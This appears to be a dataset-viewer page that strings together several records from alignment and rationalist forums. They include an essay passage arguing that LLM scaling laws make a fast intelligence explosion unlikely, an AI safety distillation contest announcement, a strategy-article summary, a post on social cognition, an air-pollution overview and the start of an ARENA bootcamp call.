(to the extent that an IQ that high number is even a meaningful concept: let's make this number better defined by also assuming that this is O(10) times the forward-pass computational capacity needed to do a decent simulation of an IQ 100 human). In its foundation model form, this LLM is never going to actually simulate someone with IQ ~1000, since its pretraining distribution contains absolutely no text generated by humans with an IQ of ~1000 (or even IQ over 200): this behavior is way, way out-of-distribution. Now, the Net (and presumably the training set derived from it for this LLM) does contain plenty of text generated very slowly and carefully with many editing passes and much debate by groups of people in the IQ ~100 to ~145 range, such as Wikipedia and scientific papers, so we would reasonable expect the foundation model of such a very capable LLM to also learn the superhuman ability to generate texts like these in a single pass without any editing. This is useful, valuable, and impressive, and might even help somewhat with the early stages of a FOOM, but it's still not the same thing as actually simulating agents with IQ 1000, and it's not going to get you to a technological singularity: at some point, that sort of capabilities will top out.
But that's just the foundation model. Next, the model presumably gets tuned and prompted somehow to get it to simulate (hopefully well-aligned) smarter human-like agents, outside the pretraining distribution. A small (gaussian-tail-decreasing) amount of pretraining text from humans with IQs up to ~160 (around four standard deviations above the mean) is available, and let us assume that very good use is made of it during this extrapolation process. How far would that let the model accurately extrapolate out-of-distribution, past where it has basically any data at all: to IQ 180, probably; 200, maybe; 220, perhaps?
If Hollywood is a good guide, IQ 80-120 humans are abysmal at extrapolating what a character with IQ 160 would do: any time a movie character is introduced as a genius, there are a very predictable set of mistakes that you instantly know they're going to make during the movie (unless them doing so would actively damage the plot). With the debatable exceptions of *Real Genius*, and *I.Q.*, movie portrayals of geniuses are extremely unrealistic. Yet most people still enjoy watching them. *Big Bang Theory* was probably the first mass media to accurately portray rather smart people (even if it still had a lot of emphasis on their foibles), and most non-nerds didn't react like this was particularly new, original, or different.
Hollywood/TV aside, how hard is it to extrapolate the behavior of a higher intelligence? Some things, what one might call zeroth-order effects, are obvious. The smarter system can solve problems the dumber one could usually solve, but faster and more accurately: what one might describe as "more-of-the-same" effects, which are pretty easy to predict. There are also what one might call first order effects: the smarter system has a larger vocabulary, has learnt more skills (having made smarter use of available educational facilities and time). It can pretty reliably solve problems that the dumber one can only solve occasionally. These are what one might call "like that but more so" effects, and are still fairly easy to predict. Then there are what one might call second-order effects: certain problems that the dumber system had essentially zero chance of solving, the smarter system can sometimes solve: it has what are in the AI business are often called "emergent abilities". These are frequently hard to predict, and especially so if you've never seen any systems that smart before. [There is some good evidence that using metrics that effectively have skill thresholds built into them greatly exaggerates the emergentness of new behaviors, and that on more sensible metrics almost all new behaviors emerge slowly with scale. Nevertheless, there are doubtless things that anyone with IQ below 180 just has 0% probability of achieving, and these are inherently hard to predict if you've never seen any examples of them, and they may be very impactful even if the smarter system's success chance for them is still quite small: genius is only 1% inspiration, as Einstein pointed out.] Then there are the third-order consequences of its emergent abilities: those emergent abilities combining and interacting with each other and with all of its existing capabilities in non-obvious ways, which are even harder to predict. Then there are fourth-and-higher order effects: to display the true capabilities of the smarter system, we need to simulate not just one that spent its life as a lonely genius surrounded by. dumber systems, but that instead one that grew up in a society of equally-smart peers, discussing idea with them and building on the work of equally-smart predecessors, educated by equally-smart teachers using correspondingly sophisticated educational methods and materials.
So I'm not claiming that doing a zeroth-order or even first-order extrapolation up to IQ 1000 is very hard. But I think that adding in the second, third, fourth, and fifth-plus-order effects to that extrapolation are increasingly hard, and I think those higher order effects are large, not small, in importance compared to the zeroth and first-order terms. Someone who can do what an IQ 100 person can do but at 10x the speed while using 10x the vocabulary and with a vanishingly small chance of making a mistake is *nothing like* as scary as an actual suitably-educated IQ 1000 hypergenius standing on the shoulders of generations of previous hypergeniuses.
Let's be generous, and say that a doable level of extrapolation from IQ 80-160 gets the model to be able to reasonably accurately simulate human-like agents with an IQ of all the way up to maybe about IQ 240. At this point, I can only see one reasonable approach to get any further: you need to have these IQ 240 agents generate text. Lots and lots of text. As in, at a minimum, of the order of an entire Internet's worth of text. Probably more, since IQ 240 behavior is more complex and almost certainly needs a bigger data set to pin it down.
[I have heard it claimed, for example by Sam Altman during a public interview, that a smarter system wouldn't need anything like as large a dataset to learn from as LLMs currently do. Humans are often given as an existence proof: we observably learn from far fewer text/speech tokens than a less capable LLM does. Of course, the number of non-text token-equivalents from vision, hearing, touch, smell, body position and all our other senses we learn from is less clear, and could easily be a couple-of-orders-of-magnitude larger than our text and speech input. However, humans are not LLMs and we have a *lot* more inbuilt intuitive biases from our genome. We have thousands of different types of neurons, let alone combinations of them into layers, compared to a small handful for a transformer. While much of our recently-evolved overinflated neocortex has a certain '[bitter-lesson](https://www.cs.utexas.edu/~eunsol/courses/data/bitter_lesson.pdf)-like' "just scale it!" look to it, the rest of our brain looks very much like a large array of custom-evolved purpose-specific modules all wired together in a complicated arrangement: a most un-bitter-lesson-like design. The bitter lesson isn't about what gives the most efficient use of processing power, it's about what allows the fastest rate of technological change: less smart engineering and more raw data and processing power. Humans are also, [as Eliezer has pointed out](https://twitter.com/i/web/status/1644776066853240834), learning to be one specific agent of our intelligence level, not how to simulate any arbitrary member of an ensemble of them. As for the LLMs, it's the transformer model that is bring pretrained, not the agents it can simulate. LLMs don't use higher order logic: they use stochastic gradient descent to learn to simulate systems that can do higher-order logic. Their learning process doesn't get to apply the resulting higher order logic to itself, by any means more sophisticated than SGD descending the gradient curve pf its outcome to a closer match to whatever answers are in the pretraining set. So I see no reason to expect that the scaling laws for LLMs are going to suddenly and magically dramatically improve to more human-like dataset sizes as our LLMs "get smarter". You mileage may of course vary, but I think Sam Altman was either being extremely optimistic, prevaricating, or else expects to stop using LLMs at some point. This does suggest that there could be a capability overhang, telling us that LLMs are not computationally efficient, or at lest not data-efficient — they're just efficient in a bitter-lesson sense, as the quickest technological shortcut to building a brain: a lot faster than whole brain emulation or reverse engineering the human brain, but quite possibly less efficient, or at very least less data-efficient.]
If that's the case, then as long as we're using LLMs, the Chinchilla scaling laws will continue to apply, unless and until they taper off into something different (by Sod's law, probably worse). An LLM capable of simulating IQ 240 well is clearly going to need at least 2.4 times as many parameters (I suspect it might be more like 2.42, but I can't prove it, so lets be generous and assume I'm wrong here). So by Chinchilla, that means we're going to need 2.4 times as large a training set generated at IQ ~240 as the IQ ~100 Internet we started off with. So 2.4 times as much content, all generated by things with 2.4 times the inherent computational cost, for a total cost of 2.42 times creating the Internet. [And that's assuming the simulation doesn't require any new physical observations of the world, just simulated thinking time, which seems *highly* implausible to me: some of those IQ 240 simulations will be of scientists writing papers about the experiments they performed, which will actually need to be physically performed for the outputs to be any use.]
On top of the fact that our first internet was almost free (all we had to do was spider and filter it, rather than simulate the writing of it), that's a nasty power law. We're going to need to do this again, and again, at more stages on the way to IQ ~1000, and each time we increase the IQ by a factor of k, the cost of doing this goes up by O(k2) [again, ignoring physical experiment costs]. That's not a formula for FOOM: that looks a lot more like formula for a subexponential process where each generation takes k times longer than the last one.
The standard argument for the likelihood of FOOM and the possibility of a singularity is the claim that technological process is inherently superexponential, inherently a J-shaped curve: that progress shortens the doubling time to more progress. If you look at the history of *Home sapiens*' technology for the origin of our species to now, it definitely looks like a superexponential J-shaped curve. What's less clear is whether it still looks superexponential if you divide the rate of technological change by the human population at the time, or equivalently use cumulative total human lifespans rather than time as the x-axis. My personal impression is that if you do that then it looks like the total number of human lifespans between different major technological advances is fairly constant, and it's a boring old exponential curve. If I'm correct, then the main reason for *Homo sapiens*' superexponential curve is that technological improvements also enlarge the human population-carrying capacity of the Earth, so let us do more invention work in parallel. So I'm not entirely convinced that technological change is in fact inherently superexponental, short of dirty tricks like that, which might-or-might-not be practicable for an ASI trying to FOOM to replicate.
[Technical aside: I suspect, for fairly simple physical reasons, that processing power per atom of computronium at normal temperatures has a practical maximum, so the only way to continually geometrically increase your planetary population is to increase the proportion of the planet (or solar system) that you've turned into computronium (just like humans did for human-brain computronium), which has practical limits, albeit perhaps large ones. Sufficiently exotic not-ordinary-matter forms of computronium might modify this, but repeating this trick each technologogical generation may be hard, and this definitely isn't a type of FOOM that I'd want to be on the same planet as.]
However, even if I'm wrong and technology inherently is a superexponential process, this sort of k2 power law is a great way to convert a superexponential back to an exponential or even subexponential. Whether this happens depends just how superexponential your superexponential is: so that means the FOOM may, or may not, instead be just a rising curve with no singularity within any finite time.
Now, one argument here would be that LLMs are inefficient, our AIs need to switch to building their agent minds directly, and this is just a capacity overhang. But I think the basic argument still applies, even after this: something k times smarter needs k times the processing power to run. But to reach its full capacity, it also needs suitable cultural knowledge as developed by things as smart as it. That will be bigger, by some power of k, call it alpha, than the cultural knowledge needed by the previous generation. So the total cost of generating that knowledge goes up by a power of k1+alpha. I'm pretty sure alphawill be around 1 to 2, so 1+alpha is in the range around 2 to 3. So changing to a different architecture doesn't get rid if the unhelpful power law. Chinchilla is a general phenomenon: to reach their full potential, smarter things need more training data, and the cost of crating that and training on it goes up as the product of the two.
So, I'm actually somewhat dubious that FOOM or a singularity is possible *at all*, for *any* cognitive architecture. But it definitely looks very challenging with LLM scaling laws.
Suppose that this were correct, what would this mean for ASI timelines? It doesn't change timelines until a little after AGI is achieved. But it would mean that the common concern that AGI might be followed only a few years or months later by a FOOM singularity was mistaken. If so, then we would find ourselves able to cheaply apply many (hopefully well-aligned) agents that were perhaps highly superhuman in certain respects, but that overall were merely noticeably smarter than the smartest human who has ever lived, to any and all problems we wanted solved. The resulting scientific and technological progress and economic growth would clearly be very fast. But the AIs would tell us that, for reasons other than simple processing power, creating an agent much smarter than them is a really hard problem. Or, more specifically, that building it isn't that hard, but properly training/educating it is. They're working on it, but it's going to take even them a while. Plus, the next generation after that will clearly take longer, and the one after that longer still, unless we want to allow them to convert a growing number of mountain ranges into computronium and deserts into solar arrays. Or possibly the moon.
Am I sure enough of all this to say "Don't worry, FOOM is impossible, there definitely will not be a singularity?" No. For example, [Grover's algorithm](https://en.wikipedia.org/wiki/Grover%27s_algorithm) running on quantum hardware might change the power laws involved just enough to make things superexponential again, by shifting k1+alpha to k0.5+alpha. However, this argument *has* significantly reduced my P(Doom). |
93cd63e6-a15c-479e-8d0e-a4c7e7800c07 | StampyAI/alignment-research-dataset/eaforum | Effective Altruism Forum | Calling for Student Submissions: AI Safety Distillation Contest
At EA UC [Berkeley](https://eaberkeley.com/), we’re launching an ongoing series of contests called the Artificial Intelligence Misalignment Solutions (AIMS) series. This second contest, the [Distillation Contest](https://eaberkeley.com/aims-distillation), is now open to any student enrolled in a university/college: here are our [interest](https://airtable.com/shrUmIqmAoLaNlBQV) and [submission](https://airtable.com/shrffmjDA8Udu4SoC) forms! The contest has prizes as large as $2,500 and closes on May 20th. This blog post restates the information that is on our website, with a bit more explanation of the contest's purpose.
* A huge thank you to Akash for creating the infrastructure and support that allow this project to launch!
* *This competition is for distillations of posts, papers, and research agendas. For short-form arguments for the importance of AI safety, see the* [*AI Safety Arguments Competition*](https://forum.effectivealtruism.org/posts/p3eiBqnijXPv5pCMA/usd20k-in-prizes-ai-safety-arguments-competition)*.*
**Purpose**
===========
AIMS Series
I think that it is currently difficult for university students to find tangible ways to engage with AI Safety. Generally, by creating a series of AI Safety contests, I hope to:
* Help build social capital for students who are interested in Alignment and potentially good at it.
* Create ways for people to test their fit for Alignment work.
* Create a “brand” around my contests over time so that CS students recognize its name and winners recommend the contests to their friends. Hopefully, this name recognition would also increase the ability to create partnerships with CS orgs as well.
For this specific contest, I’m inspired by the arguments that the field of AI Alignment [needs more distillers](https://www.lesswrong.com/posts/zo9zKcz47JxDErFzQ/call-for-distillers) to improve communication [within the field](https://distill.pub/2017/research-debt/), as well as to make their research accessible to a wider audience. The Distillation Contest aims to produce value by:
* Recruiting CS students who have never heard of EA or Alignment before (I will be doing this outreach at UC Berkeley through advertising, but other organizers are welcome to advertise to their own groups for recruitment).
* Increasing the engagement of students who are already interested in Alignment.
* Potentially producing useful distillations of Alignment research and increasing accessibility to said research.
**Contest description:**
========================
The Distillation Contest asks that participants:
* 1) Pick an article/post/research paper on AI Alignment/Safety (ideally from our list below) that would benefit from being more clearly explained.
* 2) Indicate which ideas or sections of their chosen research should be distilled. Applicants can either distill a whole post/article, a specific part of the post/article, or multiple posts/articles.
* 3) Create a distillation: a clearer explanation of the research, along with a new example or new application of the research.
* 4) Optionally: If there is a problem that is trying to be solved by the research you’re distilling, you can attempt to create an additional solution to the problem and include it in your response.
### What makes a good distillation?
A good distillation would explain the **most confusing part** of another piece of writing – the use of distillation is found in creating new ways to understand confusing concepts or confusing technical writing. These distillations would also help readers infer how the distilled ideas **relate to other Alignment research**. Because of this, creating a good distillation will likely require participants to **read related research** outside of their distilled post in order to make sure they fully understand the ideas presented in the paper.
As an example of a great distillation, Holden Karnofsky, after creating the Most Important Century Series, created a [roadmap](https://www.cold-takes.com/most-important-century-series-roadmap/) to make the series more digestible and navigable. Additionally, Scott Alexander has distilled multiple [complex](https://astralcodexten.substack.com/p/biological-anchors-a-trick-that-might) [dialogues](https://astralcodexten.substack.com/p/yudkowsky-contra-christiano-on-ai?s=r) (and even a [meme](https://astralcodexten.substack.com/p/deceptively-aligned-mesa-optimizers?s=r)) in order to make them more accessible.
Posts/articles that we would encourage applicants to choose for the Distillation Contest to distill include the following list. Applicants are allowed to propose their own posts/articles outside of this list, although it’s possible that the judges will not believe that those articles are convoluted enough to need distillation. Therefore, it’s recommended that applicants distill from the list below. (This list may change over time.)
* Technical research papers from the [Alignment Fundamentals Curriculum](https://docs.google.com/document/d/1mTm_sT2YQx3mRXQD6J2xD2QJG1c3kHyvX8kQc_IQ0ns/edit). Especially the optional readings
* Richard Ngo’s [AGI Safety from First Principles](https://www.alignmentforum.org/s/mzgtmmTKKn5MuCzFJ) sequence
* Evan Hubinger’s [Risks from Learned Optimization](https://www.lesswrong.com/posts/FkgsxrGf3QxhfLWHG/risks-from-learned-optimization-introduction) sequence
* John Wentworth posts (see the first comment [here](https://www.lesswrong.com/posts/zo9zKcz47JxDErFzQ/call-for-distillers)):
+ [The Pointers Problem: Human Values are a Function of Human Latent Variables](https://www.lesswrong.com/posts/gQY6LrTWJNkTv8YJR/the-pointers-problem-human-values-are-a-function-of-humans)
+ [Variables Don’t Represent the Physical World](https://www.lesswrong.com/posts/QaxMwZfMpMYGDeGvX/variables-don-t-represent-the-physical-world-and-that-s-ok)
+ [Selection Theorems](https://www.lesswrong.com/posts/G2Lne2Fi7Qra5Lbuf/selection-theorems-a-program-for-understanding-agents)
+ Debates about how to think about outer alignment and inner alignment ([here](https://www.lesswrong.com/posts/HYERofGZE6j9Tuigi/inner-alignment-failures-which-are-actually-outer-alignment), [here](https://www.lesswrong.com/posts/SzecSPYxqRa5GCaSF/clarifying-inner-alignment-terminology), and [here](https://www.lesswrong.com/posts/a7jnbtoKFyvu5qfkd/formal-inner-alignment-prospectus)).
* [Late 2021 MIRI Conversations](https://www.lesswrong.com/s/n945eovrA3oDueqtq)
* [What Failure Looks Like](https://www.alignmentforum.org/posts/HBxe6wdjxK239zajf/what-failure-looks-like)
* [Eliciting Latent Knowledge](https://docs.google.com/document/d/1WwsnJQstPq91_Yh-Ch2XRL8H_EpsnjrC1dwZXR37PC8/edit#) technical report
### Prizes
$2,500 - One prize available for 1st place submission.
$1,250 - One prize available for 2nd place submission.
$500 - Up to 5 prizes available.
$250 - Up to 10 prizes available.
All prize winners’ names will be posted on the EA Berkeley website and selected distillations will be optionally posted to the website.
### Scoring
Distillations will be scored on the following factors:
* Depth of understanding
* Clarity of presentation
* Rigor of work
* Concision/Length (longer papers will need to present more information than shorter papers)
* Originality of insight
* Accessibility
Preference may be given to distillations that:
* Synthesize multiple sources
* Increase the ease of access for the distillation to be an introduction to a topic
**Final Notes**
===============
There are a few other purposes to this contest that I did not list above but may write about in a future forum post! There are also likely some great articles that should be distilled in addition to the collection of the current list of recommended articles to distill (which were chosen by Akash Wasil). If you have any top recommendations for articles you'd like to be distilled, I may make additions to our existing list so that applicants have a higher chance of distilling that article.
Finally, since the contest is open to all students, please feel free to **share our contest information** with university students you know! Here is a [link](https://docs.google.com/document/d/1EbqgialsbDNJ5J8mxQJnrcCCWf3uPawUlKAHh0-f-aQ/edit?usp=sharing) to our current advertising material for other organizers to distribute if they'd like. |
4c9abb7b-0f35-4209-8128-5ec28ffc46e8 | trentmkelly/LessWrong-43k | LessWrong | TSR #6: Strength and Weakness
**This is part of a series of posts where I call out some ideas from the latest edition of The Strategic Review (written by Sebastian Marshall), and give some prompts and questions that I think people might find useful to answer. I include a summary of the most recent edition, but it's not a replacement for reading the actual article. Sebastian is an excellent writer, and your life will be full of sadness if you don't read his piece. The link is below.
Background Ops #6: Strength and Weakness
SUMMARY
* Soviet Marshal Zhukov had his work cut out for him, and did a pretty stellar job.
* Having a clear understanding of your strengths and weakness gives insight into how to design your ops.
* Ways ops (operations) typically fail:
* They aren’t playing to your strengths
* Don’t acknowledge/mitigate weakness
* Not understanding your s and w
* You created a “platonic” ops that “should” work but doesn’t
* “A commander must not be afraid of fighting under unfavourable circumstances.”
* When looking to develop and install operations successfully, things typically don’t change quickly, but they do change. You should periodically re-assess where you’re at, so you don’t fail to capitalize on gains or mitigate emerging weaknesses.
* Things have to actually work, so make sure you’re dealing with the non ideal aspects of your current situation.
It’s really useful to see examples of someone using principles in action. Reading about General Zhukov expertly navigating the strengths and weaknesses of the Soviets and Nazis is a great way to learn. Similarly, I really like Yudkowsky's coming of age story in the sequences. Observing the steps of someone’s mind as they make mistakes or do things well is very informative.
I like the points Sebastian has made about reasons operations often fail, and I think it gives a decent guide on how to kick off a post mortem on plans and ops that you’ve made which haven't worked out.
Most often, my ops fail because I don’t |
f1998882-72bc-4f20-955a-7ba46768c3f6 | trentmkelly/LessWrong-43k | LessWrong | Hypothesis about how social stuff works and arises
EDIT, 2022:
this post is still a reasonable starting point, but I need to post a revised version that emphasizes preventing dominance outside of play. All forms of dominance must be prevented, if society is to heal from our errors. These days I speak of human communication primarily in terms of the network messaging protocols that equate to establishing the state of being in communication, modulated by permissions defined by willingness to demonstrate friendliness via action. I originally wrote this post to counter "status is all you need" type thinking, and in retrospect, I don't think I went anywhere near far enough in eliminating hierarchy and status from my thinking.
With that reasoning error warning in mind, original post continues:
Preface
(I can't be bothered to write a real Serious Post, so I'm just going to write this like a tumblr post. y'all are tryhards with writing and it's boooooring, and also I have a lot of tangentially related stuff to say. Pls critique based on content. If something is unclear, quote it and ask for clarification)
Alright so, this is intended to be an explicit description that, hopefully, could be turned into an actual program, that would generate the same low-level behavior as the way social stuff arises from brains. Any divergence is a mistake, and should be called out and corrected. it is not intended to be a fake framework. it's either actually a description of parts of the causal graph that are above a threshold level of impact, or it's wrong. It's hopefully also a good framework. I'm pretty sure it's wrong in important ways, I'd like to hear what people suggest to improve it.
Recommended knowledge: vague understanding of what's known about how the cortex sheet implements fast inference/how "system 1" works, how human reward works, etc, and/or how ANNs work, how reinforcement learning works, etc.
The hope is that the computational model would generate social stuff we actually see, as high-probability special cases - in se |
bda133c1-272e-46fa-8d97-f7227b6d9c9c | trentmkelly/LessWrong-43k | LessWrong | Air Quality and Cognition
Overview
Air pollution and concerns about its effects continue to rise globally. However, policymakers and environmental regulators have neglected the effects of air pollution on cognitive functioning. A growing body of research points to the risk of exposure to high levels of pollution. It’s unclear how well all of the research will hold up under replication, but an abundance of studies point to clear detrimental effects of air pollution on cognition and decision-making.
Several individuals and organizations are concerned about the lesser-known effects of air pollution. For example, Matt Yglesias wrote an article in 2019 highlighting recent research on air quality’s effects on cognitive ability, productivity, decision-making, and dementia and Alzeihmer’s. Patrick Collison’s blog post on the issue appeared to inspire Ygelsias’s article.
Evidence suggests that air pollution has significant effects on both short-term and long-term cognition. While some studies used natural environmental variations to test the longer-term correlation between air pollution and cognition, other studies created isolated, laboratory experiments to test the short-term effects of air pollution on cognition. Both have yielded statistically significant results pointing to the negative effects of air pollution on cognition.
While air pollution clearly negatively affects cognition, its effects are nuanced and uneven. Cognition is an umbrella term encompassing many different domains of cognition. Generally, the six main domains of cognition are visuospatial/motor function, attention/concentration, learning/memory, executive functioning, social cognition/emotions, and language/verbal skills. Air pollution affects all domains of cognition, but the severity of the effect depends on brain matter, gender, age, and the affected domain of cognition.
In particular, multiple studies find stronger negative correlations between air quality and verbal test scores than math test scores. “Gray matter re |
af1ef55a-a072-4e81-8e77-e3d9b802d457 | trentmkelly/LessWrong-43k | LessWrong | AI Alignment Research Engineer Accelerator (ARENA): call for applicants
(Edited, to now include a section specifically for FAQs about the virtual program.)
TL;DR
Apply here for the third iteration of ARENA (Jan 8th - Feb 2nd)!
Introduction
We are excited to announce the third iteration of ARENA (Alignment Research Engineer Accelerator), a 4-week ML bootcamp with a focus on AI safety. Our mission is to prepare participants for full-time careers as research engineers in AI safety, e.g. at leading organizations or as independent researchers.
The program will run from January 8th - February 2nd 2024[1], and will be held at the offices of the London Initiative for Safe AI. These offices are also being used by several safety orgs (BlueDot, Apollo, Leap Labs), as well as the current London MATS cohort, and several independent researchers. We expect this to bring several benefits, e.g. facilitating productive discussions about AI safety & different agendas, and allowing participants to form a better picture of what working on AI safety can look like in practice.
ARENA offers a unique opportunity for those interested in AI safety to learn valuable technical skills, work in their own projects, and make open-source contributions to AI safety-related libraries. The program is comparable to MLAB or WMLB, but extends over a longer period to facilitate deeper dives into the content, and more open-ended project work with supervision.
For more information, see our website.
Also note that we have a Slack group designed to support independent study of the material (join link here).
Outline of Content
The 4-week program will be structured as follows:
Chapter 0 - Fundamentals
Before getting into more advanced topics, we first cover the basics of deep learning, including basic machine learning terminology, what neural networks are, and how to train them. We will also cover some subjects we expect to be useful going forwards, e.g. using GPT-3 and 4 to streamline your learning, good coding practices, and version control.
Note - partici |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.